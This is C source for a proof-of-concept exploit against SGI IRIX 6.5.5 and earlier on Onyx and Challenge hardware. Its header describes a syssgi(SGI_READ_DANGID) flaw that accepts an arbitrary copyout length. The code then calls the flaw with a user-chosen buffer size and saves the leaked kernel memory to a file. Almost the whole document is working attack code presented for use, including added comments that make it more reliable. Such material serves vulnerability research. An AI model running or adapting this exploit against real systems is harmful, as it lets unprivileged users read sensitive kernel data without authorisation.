/* SGI IRIX <= 6.5.5 syssgi() Onyx kernel memory disclosure
* ========================================================
* The SGI BSD system call interface "syssgi" contains a memory
* information leak vulnerability in SGI_READ_DANGID. The flaw
* is only present on IP19/IP21/IP25 systems which were used in
* the SGI Onyx, Challenge and Power Challenge line of systems.
* The vulnerability allows a user to supply a buffer and an arbitrary
* length to a copyout() operation. This allows kernel memory to be
* disclosed to user-space applications that hold no privileges or
* capabilities.
*
* - Hacker Fantastic (https://hacker.house)
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/syssgi.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
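/*
 * Proof-of-concept driver for the SGI_READ_DANGID disclosure described in
 * the file header: allocates a zeroed buffer of the requested size, passes
 * it to syssgi(SGI_READ_DANGID, ...) and saves the buffer to a file.
 *
 * argv[1]  path of the output file
 * argv[2]  buffer size in bytes (positive decimal integer)
 *
 * Exits 0 only when the syscall, the open and the write all succeed;
 * exits 1 on a usage error or any failure.
 */
int main(int argc, char *argv[])
{
    int fd;
    int rc = 1;
    long requested;
    char *end;
    size_t bufsize;
    ssize_t out;
    char *output_buffer;

    if (argc < 3) {
        printf("[ Use with <filepath> <size>\n");
        exit(1);
    }
    printf("[ IRIX 6.5.5 syssgi() Onyx IP19/IP21/IP25 kernel memory information leak\n");

    /* atoi() cannot report errors and a negative value would turn into a
     * huge size_t below, so parse strictly and insist on a positive size. */
    errno = 0;
    requested = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || requested <= 0) {
        fprintf(stderr, "[ Invalid size: %s\n", argv[2]);
        exit(1);
    }
    bufsize = (size_t)requested;

    /* Zero-filled so that any non-zero byte in the dump was written by the
     * kernel rather than left over from the heap. */
    output_buffer = calloc(1, bufsize);
    if (!output_buffer) {
        perror("calloc");
        exit(1);
    }

    out = syssgi(SGI_READ_DANGID, output_buffer, bufsize);
    /* NOTE(review): assumes the usual syssgi() convention of returning -1
     * with errno set on failure - confirm against the IRIX man page. On
     * failure the buffer holds only zeros, so nothing is written. */
    if (out == -1) {
        perror("syssgi");
        free(output_buffer);
        exit(1);
    }

    /* The dump may contain sensitive kernel data: create it readable by the
     * owner only, and truncate so stale bytes of an older, larger file do
     * not end up mixed into the result. */
    fd = open(argv[1], O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd == -1) {
        perror("open");
        free(output_buffer);
        exit(1);
    }

    out = write(fd, output_buffer, bufsize);
    if (out == -1) {
        perror("write");
    } else {
        /* ssize_t is signed; cast to long so the format matches the
         * argument. A short write shows up here as a smaller count. */
        printf("[ Wrote %ld bytes to %s\n", (long)out, argv[1]);
        rc = 0;
    }
    if (close(fd) == -1) {
        perror("close");
        rc = 1;
    }

    free(output_buffer);
    exit(rc);
}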